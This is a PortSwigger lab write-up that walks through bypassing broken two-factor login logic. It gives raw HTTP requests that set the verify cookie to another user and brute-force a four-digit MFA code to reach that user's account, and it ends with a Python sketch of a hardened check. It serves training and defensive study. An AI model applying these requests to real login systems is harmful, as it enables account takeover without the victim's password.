
PortSwigger 2FA broken logic

2FA broken logic

Solution

Open the website: https://0aae00f10455f8b483f8ff4600d80036.web-security-academy.net/login

https://0aae00f10455f8b483f8ff4600d80036.web-security-academy.net/login
---
GET /login HTTP/2
Host: 0aae00f10455f8b483f8ff4600d80036.web-security-academy.net
Cookie: session=dCelRZWOtKel49qE0BdTc6iJRwpx8aaE; verify=wiener
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0aae00f10455f8b483f8ff4600d80036.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /login HTTP/2
Host: 0aae00f10455f8b483f8ff4600d80036.web-security-academy.net
Cookie: session=dCelRZWOtKel49qE0BdTc6iJRwpx8aaE; verify=wiener
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: https://0aae00f10455f8b483f8ff4600d80036.web-security-academy.net
Referer: https://0aae00f10455f8b483f8ff4600d80036.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

username=wiener&password=peter

Read MFA code from email

https://exploit-0a460087042bf83683fdfe5b01cf006e.exploit-server.net/email
---
GET /email HTTP/1.1
Host: exploit-0a460087042bf83683fdfe5b01cf006e.exploit-server.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0aae00f10455f8b483f8ff4600d80036.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive

Login as user: wiener

MFA code: 0965
---
POST /login2 HTTP/2
Host: 0aae00f10455f8b483f8ff4600d80036.web-security-academy.net
Cookie: session=1shiu98IdEb3KNJfsJ9YBOBgFd6VmH7z; verify=wiener
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Origin: https://0aae00f10455f8b483f8ff4600d80036.web-security-academy.net
Referer: https://0aae00f10455f8b483f8ff4600d80036.web-security-academy.net/login2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

mfa-code=0965

Create a request to submit the MFA code for user carlos

Set the cookie: verify=carlos
---
POST /login2 HTTP/2
Host: 0a8500c703382f71805a3516007900da.web-security-academy.net
Cookie: session=SoHq3nzCOnbZwQdxBBwo3MJPmgKhjCzC; verify=carlos
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a8500c703382f71805a3516007900da.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
I have to add the missing parameter "mfa-code"
---
POST /login2 HTTP/2
Host: 0a8500c703382f71805a3516007900da.web-security-academy.net
Cookie: session=SoHq3nzCOnbZwQdxBBwo3MJPmgKhjCzC; verify=carlos
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a8500c703382f71805a3516007900da.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

mfa-code=0000

Bruteforce login as user: carlos

Bruteforce MFA code
---
POST /login2 HTTP/2
Host: 0a8500c703382f71805a3516007900da.web-security-academy.net
Cookie: session=SoHq3nzCOnbZwQdxBBwo3MJPmgKhjCzC; verify=carlos
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a8500c703382f71805a3516007900da.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Content-Length: 13
Connection: keep-alive

mfa-code=1036

Login as user: carlos without password

POST /login2 HTTP/2
Host: 0a8500c703382f71805a3516007900da.web-security-academy.net
Cookie: session=SoHq3nzCOnbZwQdxBBwo3MJPmgKhjCzC; verify=carlos
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a8500c703382f71805a3516007900da.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Content-Length: 13
Connection: keep-alive

mfa-code=1036
---
GET /my-account?id=carlos HTTP/2
Host: 0a8500c703382f71805a3516007900da.web-security-academy.net
Cookie: session=ZxhYHzIjJH3Do71ehOAfNx1dama0fFei; verify=wiener
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: http://burpsuite/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Priority: u=0, i
Te: trailers

Solved
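
The requests above work because /login2 takes the account to verify from the client-supplied `verify` cookie and does not limit code guesses. The sketch below is an added example, not part of the original write-up or the lab's code, contrasting that pattern with a check bound to server-side session state; the class, method names and `MAX_ATTEMPTS` value are assumptions.

```python
import hmac
import secrets

MAX_ATTEMPTS = 5  # assumed lockout threshold, not taken from the lab


class TwoFactorGate:
    """Hypothetical 2FA state kept on the server, keyed by session id."""

    def __init__(self):
        self.pending = {}    # session_id -> {"user", "code", "attempts"}
        self.logged_in = {}  # session_id -> user

    def password_ok(self, session_id, user):
        # Call only after the password check for `user` has succeeded.
        code = f"{secrets.randbelow(10_000):04d}"
        self.pending[session_id] = {"user": user, "code": code, "attempts": 0}
        return code  # delivered out of band (e-mail), never sent to the browser

    def verify_vulnerable(self, session_id, verify_cookie, submitted, codes_by_user):
        # Pattern the write-up exercises: the client-controlled cookie picks the
        # account, and nothing counts failed guesses.
        if submitted == codes_by_user.get(verify_cookie):
            self.logged_in[session_id] = verify_cookie
            return True
        return False

    def verify_hardened(self, session_id, verify_cookie, submitted):
        # The account comes from server-side state; verify_cookie is ignored.
        state = self.pending.get(session_id)
        if state is None:
            return False  # no completed password stage in this session
        state["attempts"] += 1
        if state["attempts"] > MAX_ATTEMPTS:
            del self.pending[session_id]  # force a fresh login and a new code
            return False
        if hmac.compare_digest(submitted.encode(), state["code"].encode()):
            self.logged_in[session_id] = state["user"]
            del self.pending[session_id]  # each code is single use
            return True
        return False
```

With the hardened check, changing `verify` to another username has no effect, and the sixth guess in a session discards the pending code so the password stage must be repeated.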